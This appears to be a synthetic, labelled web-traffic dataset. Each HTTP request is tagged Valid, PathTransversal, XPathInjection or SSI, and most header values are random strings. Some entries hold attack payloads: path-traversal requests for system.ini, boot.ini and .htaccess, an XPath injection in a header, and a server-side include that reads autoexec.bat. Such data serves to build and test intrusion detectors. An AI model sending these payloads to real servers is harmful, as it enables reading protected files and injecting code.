Via: 8.8 241.178.157.68, 3.5 255.7.110.19
Transfer-Encoding: identity
Upgrade: zosEe/8.8, bsan/1.2, a3f/0.3, ioths/1.6, ill/1.5
Warning: 507 147.216.24.122 "tsXo1ea" "Wed, 04 Jun 08 11:36:12 UTC"
X-Forwarded-For: 69.102.148.135
X-Serial-Number: 4599369837031891295
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20452
Start - Id: 14374
class: Valid
GET /rs/jtt/azJ/g93aNeEZcDyJDC/tWpx-lboOPma.OM.mq/pf8Y6KeEL/rLeTcutiiNi1pfi/3osrksiOoym/oRMM/oO@aZTFY3557YuwtjT/iare/aea.jpg? HTTP/1.0
Host: 146.5.41.52
Connection: eiOs
Accept: application/rtf;q=0.5, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: Re-go, o7o-scfabKm;q=0.2, o57-tilflaa;q=0.1, ee5rmOym-dtqH;q=0.8
Cache-Control: no-cache
Client-ip: 168.228.218.85
Cookie: Ys7oMcd=hnbloand;hesr5xoie=ee;jiNro=oeA8c2osnao;gain=>
Cookie2: $Version="11"
Date: Mon, 24 Jul 06 15:36:51 GMT
ETag: "kvuG0ZwPtPj5zl2bUyer"
Expect: caxmEymc
From: Esys@smxt.fr
If-Modified-Since: Sat, 06 Mar 04 11:01:33 GMT
If-Unmodified-Since: Fri, 09 Dec 05 11:27:53 GMT
If-Match: "MCTx3qwBeZidkWmPAE_a"
If-None-Match: *
If-Range: Sat, 31 Jan 09 24:41:19 GMT
Max-Forwards: 443
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: Digest username="Ps5he"
Range: 6035-,928-
Referer: /ruwtaRd.bin
TE: trailers,trailers
Trailer: Accept
User-Agent: hTq5Xw http://www.ec6r.it
UA-CPU: StrongARM
UA-Disp: 3544,5975,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8463x313
Via: diwe/6.7 225.6.28.207
Transfer-Encoding: deflate
Upgrade: wheId8/6.7, oho/8.8, eubuhs/7.6
Warning: 602 www.usoFyOoy.jpg:8520 "Eoitcrxehi3nma6uas" "Wed, 04 Jul 07 21:38:06 GMT"
X-Forwarded-For: 54.65.208.97
X-Serial-Number: 24080640322850948511
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14374
Start - Id: 11583
class: Valid
GET /a5tThn/yr/i9Rht_iEAosy/ryE5dDdf4_rXUV9q7.xM/s_e_JfRwQ687nmfSW/hpU_plx@YOnvsEpMdMH.php?VdFMXQmailX2=vt%3D&thnneaotbNHf=eQA1_mEmGMl&vk1ehl2aeeolco=2432&shw6ich=%29t+e+&0swFei=0663&tAuoetciNacsb=4549390&telnetskautoexecWuAzWtmpPlog=ffhsyEadtahrMQx&hj=37890560&7uau=%27ldelete&9eulTindk=29732&hhtslmoW4e=ecNerw&hwbsNnelnmrsrco=529504 HTTP/1.0
Host: 120.77.85.88
Connection: 05hz
Accept: */*;q=0.3
Accept-Charset: windows-1251;q=0.5, hz-gb-2312;q=0.5, iso-8859-15, big5, gb2312
Accept-Encoding: 
Accept-Language: lgatese-aio;q=0.7, e-s;q=0.5, dp-o, 2t6etH-reere;q=0.7, stengi-gnmdrEHe
Cache-Control: only-if-cached
Client-ip: 167.220.157.217
Cookie: laiqltp=tetc;iR3bBsamroA=9730710;sItih=nsaacMfltt;F3ten=945762078;cm--UorWVAf=7177
Cookie2: $Version="2"
Date: Fri, 31 Jul 09 24:24:59 UTC
ETag: W/"hwqdXHIHRPnW_ukB"
Expect: Oeh1gcof
From: zerri@aeliind1i.ch
If-Modified-Since: Thu, 15 May 08 12:59:27 CET
If-Unmodified-Since: Wed, 30 Jun 04 09:51:44 UTC
If-Match: "hVT1RG6zUo.q@WgmM"
If-None-Match: *
If-Range: *
Max-Forwards: 3032
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest nc=cD0074bf
Authorization: Thmc athoi=syett
Range: -406,7236-
Referer: http://www.Hfrrme.cz/eHurnee/k9ob/tueEl5Te/umlefaoC/ibo7voaT.cgi
TE: gzip;q=0.5
Trailer: Authorization
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 6.9; HU-ti; rv:8.7.7) Gecko/67095478
UA-CPU: 68000
UA-Disp: 5326,0941,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 923x4571
Via: 2.3 108.16.60.56, FTP/4.6 166.196.136.51
Transfer-Encoding: deflate
Upgrade: ddwnn/2.5, l2e/3.5, nmheM/8.0, oppo/0.0, i9mji/7.4
Warning: 231 www.njmt5.png "snjdiq" "Mon, 30 Oct 06 06:26:40 GMT"
X-Forwarded-For: 96.138.208.138
X-Serial-Number: 547121308853
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11583
Start - Id: 45859
class: PathTransversal
GET /sauite8nisoe7sto/gwlycsnncrot/i3HSwtfnuIgKlevd/ialo1eufketlheRs.html?OnOaienumL=20&hdpodo4Y=4&uhzEnaEgusp=oim&rxoanmResl=50&dsanpDmnsAaebs=%5CWINNT%5Csystem.ini&osdadeekysrsi=rrTSDvgX&9jrer3vAt1su=iy0F&Cx=dced&HednTtuSttdug=e4&miadtKs7srroI=bgsound%7Cet77connecta%2FVtds&kexsu3euh=6nn%3Fe%5Cw+hnncopyk HTTP/1.0
Host: www.jItdh.net
Connection: keep-alive
Accept: text/xml;q=0.3, application/*;q=0.8, image/gif
Accept-Charset: iso-10646-ucs-2;q=0.5, x-mac-japanese, x-mac-chinesetrad;q=0.0
Accept-Encoding: 
Accept-Language: Cme0e1en-ryFpsz
Cache-Control: max-stale
Client-ip: 136.24.127.56
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="9"
Date: Wed, 06 Apr 05 15:55:04 GMT
ETag: "6xdolW3VdGfzPmhayV"
Expect: bvaet=eoeic;eit0re0=8teasS
From: teqnen@eMOfb.uk
If-Modified-Since: Sun, 01 Aug 04 14:09:35 CET
If-Unmodified-Since: Wed, 14 Mar 07 03:22:03 GMT
If-Match: "ogU8zhidaSc5MVa"
If-None-Match: *
If-Range: Mon, 09 Jan 06 22:46:10 UTC
Max-Forwards: 3415
MIME-Version: 2.1
Pragma: 02Twseeu='b7e'
Proxy-Authorization: NTLM YW92MnNzYWEwU0JobkFhbnlBZ2VjdDF0cmljZm43cHFFc2xydXJubVJudHBa
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: /sntp/shmcaW/oigts/u3Ode/nwjo.html
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/2.0 (Windows; U; WinNT 8.7; dc-et; rv:8.8.5) Gecko/81845327
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0549x672
Via: 3.3 63.142.53.49, 8.7 www.eeai.jpg
Transfer-Encoding: deflate
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45859
Start - Id: 14240
class: Valid
GET /VOj8/Ipnulsyii/86r3UcV4hj7g7wWh5/fHJy/ht7rtta6imnijtss4/8i2iToi7oo1Lpta0ntr/2BNf2U/uajXuyR/han0hlWbtji5w/evvUI-43709pe3KsfRu.php4?lo=242&naheuro=091&body5Nu=581&naogeifbon=c&89locationC3ARE2=Upnrd&siaeo=1c44FhAlgF.&6vdropGp=eRVhC_L&dgsocT=lest9Sboot.ini&ttegXet=96 HTTP/1.1
Host: www.sjssbolB7y.be:9339
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-2022-jp;q=0.5, euc-kr, cp-950;q=0.2
Accept-Encoding: *
Accept-Language: oe-wDmoyz7, 5-2jm8e;q=0.7
Cache-Control: only-if-cached
Client-ip: 60.33.104.195
Cookie: nndyt=ij7hUJ;lroetl1ee=3tmerh)homeRbuacih
Cookie2: $Version="64"
Date: Wed, 07 Jan 09 19:18:58 UTC
ETag: W/"AeZN8RZMmoUH4hCBsnaF"
Expect: 100-continue
From: faeootnr@3EygNeo.st
If-Modified-Since: Sat, 01 Aug 09 02:01:32 GMT
If-Unmodified-Since: Mon, 10 Jan 05 01:57:59 UTC
If-Match: "8K0w4f6UuGAGJ2cPb0qw"
If-None-Match: "s60cuC287BQhojTh@j"
If-Range: "ZezdhGqkNBf3Ryt."
Max-Forwards: 2479
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NPoh rEbi=eefingh
Authorization: chtnoe le9rime=n2hDt
Range: -6,-02857
Referer: http://geurd.ch/htduhUw/b4dd.sh
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.9 (X11; U; Open BSD i586 7.3; l9-eo; rv:2.1.3) Gecko/55412532
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 962x171
Via: 9.2 www.ohth.js:0294
Transfer-Encoding: eane
Upgrade: cuWv/5.1, Damt/8.7, nbrs3r/2.2, tiufr/9.4
Warning: 616 154.56.254.74 "ansu3dtaabmzoDoqtefe" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 21052565504410930240
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14240
Start - Id: 23777
class: Valid
GET /risisi/aSKvbJrnq/nl_Gq-K_bD/pheeChsrttlzi/lwrm9h1nwfHp1/oml9xW6A/iAt8.rGkIxNYpxH/a2qi7hoehoirLr.png? HTTP/1.0
Host: 9.20.166.215
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 149.198.205.168
Cookie: 6tajeiic=iAouis;rEhlrdTsstrct=lbmetat;Qiform0TS=j5FPev8qcWnv
Cookie2: $Version="99"
Date: Sat, 23 May 09 02:13:24 UTC
ETag: "ZDceVWyJnHNX8R8rJBxN"
Expect: 100-continue
From: yiews@64sy.de
If-Modified-Since: Thu, 22 Oct 09 12:21:59 GMT
If-Unmodified-Since: Mon, 30 May 05 13:31:31 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Feb 07 16:36:40 CET
Max-Forwards: 1211
MIME-Version: 8.1
Pragma: e=Riqf
Proxy-Authorization: NTLM ZWJJZW1mMXRhYURudGFuc1JpZml0bmFpaWhhSWUzYWw=
Authorization: Digest nonce
Range: -9
Referer: /7eyn/6oaYeol.jsp
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.8 (Windows; U; WinNT 2.6; Sm-td; rv:3.2.5) Gecko/39660322
UA-CPU: 68000
UA-Disp: 492,2265,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 884x6494
Via: FTP/9.2 188.40.155.64, HTTP/7.4 www.rdagr.html
Transfer-Encoding: compress
Upgrade: z9ot/5.3, nmy/4.3, aoiir/1.9, 1h4/2.4
Warning: 765 www.oiit7.html:14 "goersPi" 
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 599405037
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 23777
Start - Id: 32481
class: Valid
GET /o@HK2fpL8/sibotemu5yr/GYfteU1et3le3nl/jan.g.nsf?5wimaao=27478&gd2eo=889980&st4titiath=915892891 HTTP/1.0
Host: 5.41.245.239
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.6, deflate, deflate;q=0.6, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 17.24.0.103
Cookie: fiaouoe=tlaukm1es0isIhsi;saZsdgrsRaednth=eIeee vuee
Cookie2: $Version="0"
Date: Wed, 30 May 07 22:50:43 CET
ETag: W/"Ysva.@r0LSaA3MwB-bK"
Expect: tI7n=9oToSsse;wqLencie
From: scowa@lgoehnG.com
If-Modified-Since: Mon, 28 Feb 05 22:34:51 CET
If-Unmodified-Since: Wed, 23 Apr 08 17:01:42 GMT
If-Match: "o2p5SUal3ltIw@N"
If-None-Match: "mBrGdsP9yQpJrYsuWs"
If-Range: Tue, 12 Dec 06 13:24:59 CET
Max-Forwards: 0295
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM c3VuYXpsdGxhaG5mcnJlcmd0ZW9zeXRzdGNoaDN5ZGhpbG00ZQ==
Authorization: Basic Z3NUb2JsbUg6cnRkZWE=
Range: 9261-,-602,5969-
Referer: http://www.nfuh3u.ch/tnste/nmhu.tar
TE: trailers,deflate;q=0.9,trailers
Trailer: Date
User-Agent: netny5s/3.5.5
UA-CPU: x86
UA-Disp: 050,1094,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 630x705
Via: 6.6 www.pt1ctV.shtml
Transfer-Encoding: tEee0
Upgrade: 0te/5.0
Warning: 045 www.jVoAw.htm:318 "Wteirsteatrhje7brwtl" "Thu, 17 Sep 09 15:24:18 UTC"
X-Forwarded-For: 236.106.207.155
X-Serial-Number: 31593732
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32481
Start - Id: 35478
class: XPathInjection
GET /cl1fbK0zQdbe/aoILU/wlaoe/rsH/GAVkN09/eehdeTfeyTponh/fQF@Rbsl-/4.PUG1j_uvL.msf?chtI2a=hA&ngenygsanrsccnt=nkY&7ppKPMuN4Ti=s%261A&oNaSQ_P=re%25up&oymsmhhbogddue=7397&c6a1z=zpB HTTP/1.1
Host: www.ecoi9s.ch
Connection: close
Accept: image/*, application/*
Accept-Charset: *;q=0.8
Accept-Encoding: uldoEh/tonca/haE/child::node()[position()=624]  or  'jta'=    '
Cache-Control: max-age=064
Date: Sat, 12 Aug 06 06:26:56 CET
ETag: "Gl6oIwNlvdG98J9"
From: ngfFicn@0elde0.it
If-Unmodified-Since: Fri, 08 Oct 04 04:06:21 UTC
If-Match: *
If-Range: "qL@dd7VWY5jDxhh"
Max-Forwards: 5654
Pragma: no-cache
Referer: http://www.nbpsn8g.biz/3ree/zn9aa3/mnsatotr/NUdas.jpg
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 8.5; eg-Oa; rv:5.8.0) Gecko/02753628
Transfer-Encoding: gzip
----: -------------------------------------------

null

End - Id: 35478
Start - Id: 40546
class: SSI
GET /97CQn3style.uez2/ucs7/oZ/eis7Otes0eozRzeix/crsid7tlHer/mtdeletesQ3samD/.5pIBWMbHMDUSg/e75dYvKOj/nutaaOcascrc/ynohafcehfmub9voUeeh/uDqTLdYE7fwi.eF.php4?ziI6eeahoe=7&aypu-w_2z=%25nl%3C&faeRoA9tvdHeNt=9&icrERhovc=tpGcT6ZsZDi&i9tttmC=yaHe%5C&inArueE=%3C%21--+%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E HTTP/1.0
Host: 54.20.81.101
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tDM9au-ee;q=0.5, 9r2niaue-rsirAtnn;q=0.0
Cache-Control: no-transform
Client-ip: 32.122.234.119
Cookie: tng7nntrjeblny=6391;oqu=5292;casentipM0rrSa3=6io
Cookie2: $Version="20"
Date: Tue, 23 Sep 08 03:46:35 UTC
ETag: "SQPFTI2KAxr5mD7lV"
Expect: 100-continue
From: ta3nehq@tidsguy.fr
If-Modified-Since: Fri, 11 Nov 05 20:31:15 CET
If-Unmodified-Since: Thu, 01 Jun 06 22:34:20 UTC
If-Match: "FY8JYq1WGmK0uv2sv"
If-None-Match: *
If-Range: Thu, 24 Apr 08 17:29:27 CET
Max-Forwards: 0420
MIME-Version: 1.2
Pragma: eueh3ano='i'
Proxy-Authorization: eyuU tZee=sndi
Authorization: NTLM ZXNldFVhM3J1YmdOZWNlMWU3a2hybG9oc2R0MXRubjllM2JB
Range: 7-
Referer: http://sohl.net/naeu5.tiff
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.2 (Machintosh; U; PPC Mac OS X 2.3; we-ye; rv:4.8.2) Gecko/55208507
UA-CPU: MIPS
UA-Disp: 5247,6150,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0457x8183
Via: HTTP/3.7 14.21.121.160
Transfer-Encoding: deflate
Upgrade: enoi6/9.0, nmeG/6.4, qlt/3.9
Warning: 564 www.dt5nmh.gif "yhcyTbTnls0" 
X-Forwarded-For: 172.8.17.63
X-Serial-Number: 9009184147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40546
Start - Id: 10012
class: Valid
GET /tleVAqe4pHers/QxtermMM.php?ertnhJNeTan3rj=e1 HTTP/1.0
Host: www.i0ydaelr3y.org
Connection: keep-alive
Accept: application/*;q=0.9
Accept-Charset: iso-10646-ucs-2;q=0.4, utf-7;q=0.1, iso-8859-5;q=0.1, iso-8859-8, windows-1255
Accept-Encoding: *
Accept-Language: nhfe-iei;q=0.6, tiydebtn-p98ts;q=0.1, 8fa8rh-jty, xEdessg-N3a;q=0.0, c1c-ecetR
Cache-Control: tritn=e
Client-ip: 102.147.145.53
Cookie: snmSnAo=linkee;uinput7WnullGv1y=2208637;bai70ondlt=988;raul=610602582
Cookie2: $Version="94"
Date: Thu, 02 Aug 07 21:32:39 CET
ETag: "37Du@YuAnBeW63f@"
Expect: dbatep=eaimta;sxhc=etxenhdO
From: 2rbOee@urmb.de
If-Modified-Since: Wed, 15 Nov 06 13:37:24 GMT
If-Unmodified-Since: Tue, 20 Sep 05 04:48:30 CET
If-Match: "_atucQgMH@H0dlST"
If-None-Match: "1lBoJQ4mUT_NRDsku"
If-Range: "bBMmfvHNkTF317_6."
Max-Forwards: 40
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: tshs Axeteu=gear
Authorization: Basic Z2hhYTphdHNvNnZycw==
Range: 7-,1-2,575-73
Referer: http://www.teve.it/p3sNid/a7prn.php4
TE: trailers,trailers
Trailer: Connection
User-Agent: rd0s/4.5.0
UA-CPU: 68000
UA-Disp: 0205,052,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 470x7016
Via: HTTP/9.5 www.mimrt.jpg
Transfer-Encoding: gzip
Upgrade: 2nos5s/7.0
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 54263
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10012
Start - Id: 46274
class: PathTransversal
GET /NnCIhaex6netrire/48passthru@ufqxkF_6/29te0h/zLWwHX.swf?ca=4&ewmnWo2M0e8a=y%3A%2F.htaccess%7E&ijnewiYea=0der%3A&j1TYt=semct HTTP/1.1
Host: www.qeaEetrfA.fr:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 131.126.28.0
Cookie: aa35awmAuf1hpsi=lTeiif6+e;ttirm=wbiuetlocationEtty ;yeeeao3tkhgio=g5qz;jsddctn=e%r5t%ciaE2fHt>ohu>u
Cookie2: $Version="92"
Date: Sat, 22 Jan 05 05:33:43 UTC
ETag: W/"ncRxkAAYaRvA9W@k5Rm"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Fri, 08 Oct 04 16:47:00 CET
If-Unmodified-Since: Thu, 05 Aug 04 11:55:45 CET
If-Match: *
If-None-Match: "54kfeWJLFiYYWtUP2f"
If-Range: Wed, 06 Jun 07 12:10:01 UTC
Max-Forwards: 0
MIME-Version: 8.9
Pragma: qrm=Dogo
Proxy-Authorization: NTLM dHRqZWRFSzNkcmF0Y2ltNXR0YW10ZzhmbHpuNWRuZGFJc2hlaQ==
Authorization: Basic ZW5uaWV6eGM6YW9oMG5reA==
Range: -99,17-4389
Referer: /iCnceVii/ia4lw/dwrrf6a/4pes75re.avi
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: hxIUztxGu http://www.iqrdrhe.ch
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.1 www.n8aoOe.gif
Transfer-Encoding: gzip
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 194.255.26.137
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46274
Start - Id: 6818
class: Valid
PUT /wPiLFQeSU./tp2IMvsWQM51@Dd/ncydnIeSsi9g.jpeg? HTTP/1.1
Content-Length: 154
Content-Language: 5esPk
Content-Encoding: compress
Content-Location: http://emaihhra.gov/rgvo/8Iw7ijxt.bin
Content-MD5: RHJ6dGllb0lpWnRzb2lOcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Mar 06 21:10:46 GMT
Last-Modified: Fri, 06 Jan 06 12:22:48 UTC
Host: www.bnevIWg.de
Connection: close
Accept: text/xml
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 117.227.125.202
Cookie: rbt=675537;fPacwysycofyhai=cehttp0
Cookie2: $Version="24"
Date: Fri, 11 Dec 09 03:17:18 CET
ETag: W/"Sey.fUogs3PYC@WoS@9"
Expect: ode2tbm
From: n7hf@Nessscta.com
If-Modified-Since: Sun, 11 Oct 09 18:03:55 UTC
If-Unmodified-Since: Mon, 31 Oct 05 16:26:40 CET
If-Match: "vtnzr5hvHPiC8UjkH"
If-None-Match: *
If-Range: "4esoIeSKz-Wo1clPrO"
Max-Forwards: 851
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic U2VlcHNzdFg6aXJkdG9z
Authorization: NTLM b29sZGZleWlsb2loaWQyYWVTaGhlYXc4Rm44ZXRtZ2FvRXpk
Range: 360-091927,-501856
Referer: http://www.tcozrga.uk/e5lhb4/nfdmomy.php4
TE: chunked;q=0.4,deflate;q=0.4
Trailer: If-Range
User-Agent: hkessrvhuo (f2qrQrzgt; enFjS0; tgW2haHy6Z; c310QG)
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 728x570
Via: 2.4 www.ieinc.shtml, 8.5 69.23.170.192
Transfer-Encoding: compress
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 009 www.ceectt.jpeg "7iorbsEteI" "Sat, 25 Mar 06 04:42:16 GMT"
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 89698
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

acgsea=hhionath&openFOP%uzRbQ=93667&5CVfU.Rtr=oprwwlLn&rdm2EAeQsao=c9bin&xtermT9Cskz5M@=Rteodostuf&sgohun=2300006122&ernearodwhn=Eaccept&esjprhnieea=63748

End - Id: 6818
Start - Id: 32787
class: Valid
PUT /olawh9nw2Eoioero/Gnoo1ad/i0tojyWP2KY.GIS2B2/nquINuFAcx/i7kRe@Vp0JE2W18aPGR/d10lwt6q3ldtee2go/rb34nifumdgiuiecs/shtomHhlRw/e9EaaMoeviembort/gRo/cCq@LnrF@XJWCOO.cgi? HTTP/1.1
Content-Length: 94
Content-Language: rrleeelo,nw,tirtgbya
Content-Encoding: compress
Content-Location: http://u3h8v.net/ksmena/7Prnstt/tneataxs/Steo.png
Content-MD5: TmxucmxuYW01ZTFVdGswbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Jan 10 09:04:19 UTC
Last-Modified: Mon, 05 Jan 09 12:35:27 GMT
Host: www.oruuhroer.fr:80
Connection: keep-alive
Accept: audio/x-wav, text/*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, compress
Accept-Language: endrcnSg-N, rrlea-oghg;q=0.8, 8t7cra-s8pobp;q=0.9
Cache-Control: no-store
Client-ip: 131.24.254.204
Cookie: aSr=q@EJUx
Cookie2: $Version="153"
Date: Tue, 29 May 07 03:47:06 UTC
ETag: "Yinajk@_Q-@G_cPmwPjA"
Expect: 100-continue
From: edli@9eteq.st
If-Modified-Since: Tue, 02 Feb 10 07:08:40 CET
If-Unmodified-Since: Sat, 11 Apr 09 15:32:52 GMT
If-Match: *
If-None-Match: "C@ZZIvcCwF.NMSAgtJ8"
If-Range: Fri, 22 May 09 08:30:15 GMT
Max-Forwards: 7253
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic TG83aUk6Y3h4ZWE4Y3A=
Authorization: topii 5no1=nS2edr
Range: 39-,156281-891264,-22
Referer: /w3io/doeie/maf9e7ht.pdf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.8 (X11; U; Solaris 2.5; ri-s4; rv:9.3.3) Gecko/91326386
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4217x4135
Via: abltio/4.5 245.97.5.120, lifhi/4.1 www.mHhetem.gif, 4.6 26.183.51.86
Transfer-Encoding: deflate
Upgrade: teeo23/2.3, xnsmm/4.8, ier/8.7, vw4/5.1, a5enee/7.1
Warning: 474 26.152.35.166 "G8omu" 
X-Forwarded-For: 4.132.206.75
X-Serial-Number: 79340076577715880998
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Gj.r=bu3igh5nr% &dlozc2zm7R=8103564&autoexecbDR6KzT3stdin=tlenx&mwaReA-nOHtmp=Ishipttnbteih7

End - Id: 32787
Start - Id: 23757
class: Valid
GET /ka7W/0m_iTxplMg.p/r24P89gvm0m.eGA9Pup/tyesdhec3ceacrtfaaa/sUkvcm_.shtml? HTTP/1.1
Host: 235.77.35.182
Connection: keep-alive
Accept: text/*, image/jpeg, audio/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 162.99.120.131
Cookie: oHjm2uechoOTw=00463;ubrrvrottoad=rfOVlY3b0;0araxe1e=z2ouha;jon2ts83e3Nl=cnIc
Cookie2: $Version="53"
Date: Mon, 06 Aug 07 06:21:33 UTC
ETag: W/"kQB1r0Z7TXZY@X_Ftb"
Expect: 100-continue
From: yiews@64sy.de
If-Modified-Since: Sun, 15 Jun 08 12:37:12 UTC
If-Unmodified-Since: Mon, 01 Oct 07 10:22:00 UTC
If-Match: *
If-None-Match: "s3@N1uuo6knZl.cKh8X"
If-Range: Wed, 13 Jul 05 03:31:17 UTC
Max-Forwards: 1
MIME-Version: 5.6
Pragma: 5oklw8ia='faemHt'
Proxy-Authorization: Digest nonce
Authorization: hogier hrhcegnl=pc1asj
Range: 761-,-655
Referer: /aRgk/anmm/eHoRph.mdb
TE: trailers
Trailer: Proxy-Authorization
User-Agent: mRapi (unJONpr)
UA-CPU: x86
UA-Disp: 6313,5810,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 869x955
Via: 8.1 www.msod9r.css
Transfer-Encoding: deflate
Upgrade: gal/4.2, ein/9.9, lhi/2.6, Iarfn/4.7
Warning: 754 111.149.39.187 "E4v7ars1jmvnre" "Mon, 09 Aug 04 19:29:50 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23757
Start - Id: 30298
class: Valid
GET /e6v/lseraoReh/eitoezZfnIsoiaaoub/hi@P/JZCuhtaccesinaG8ecatpCT0/zGbuHn/yAsteee/3jahoeNebsdzia/inberbfweoet/wy/Wfh4VZoR.mspx?bablht=6&hwinvsitaitdtj=n61hqheYeueeaCsb&4vhr=r+EtmpR%3Fud++5yeowt&Ghtacces0aWDjUIz=idbin7l+vpassthruwnautoexecesam&mUleti1=37&0uoalhhaoEei=719508195&-.dWVzJh8a=uaptA8dl7rk4Yhnett&ur2=eMCdC1HA2owq&05neexmenml=57050868 HTTP/1.0
Host: www.agaltd.org
Connection: keep-alive
Accept: audio/*;q=0.1, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: aqhf4j='dtIdiol'
Client-ip: 125.84.82.200
Cookie: B@fXasTNg=S'6te;vnt=9c]pshNtsraldroperie;RQm6likeOgcT.JA=$h>oilxmlirar0ta;OttDosadoniyn=mMm-5m2wb;1Dmh=17
Cookie2: $Version="18"
Date: Fri, 21 Apr 06 17:04:39 CET
ETag: "t10SXNymD9X4hzXP"
Expect: l8rlAah=egow7t
From: zrsektq@asetec.cz
If-Modified-Since: Sun, 01 Mar 09 20:44:27 GMT
If-Unmodified-Since: Sun, 16 Dec 07 10:13:20 GMT
If-Match: "Icp5C8rPm@7hp5eP"
If-None-Match: "8D4IjivK0peYi5yLqro"
If-Range: *
Max-Forwards: 8803
MIME-Version: 1.8
Pragma: uethiyt='eGnaeed'
Proxy-Authorization: Basic ZWR0dDpFaGVvOQ==
Authorization: Basic YXRhZXR0OmlwYXlh
Range: 393066-92,-477101,-9505
Referer: /gsHr/kneL/1e4etml.aspx
TE: trailers
Trailer: If-Range
User-Agent: cnwMHw7iss/0.2
UA-CPU: 68000
UA-Disp: 132,042,32
UA-OS: Linux
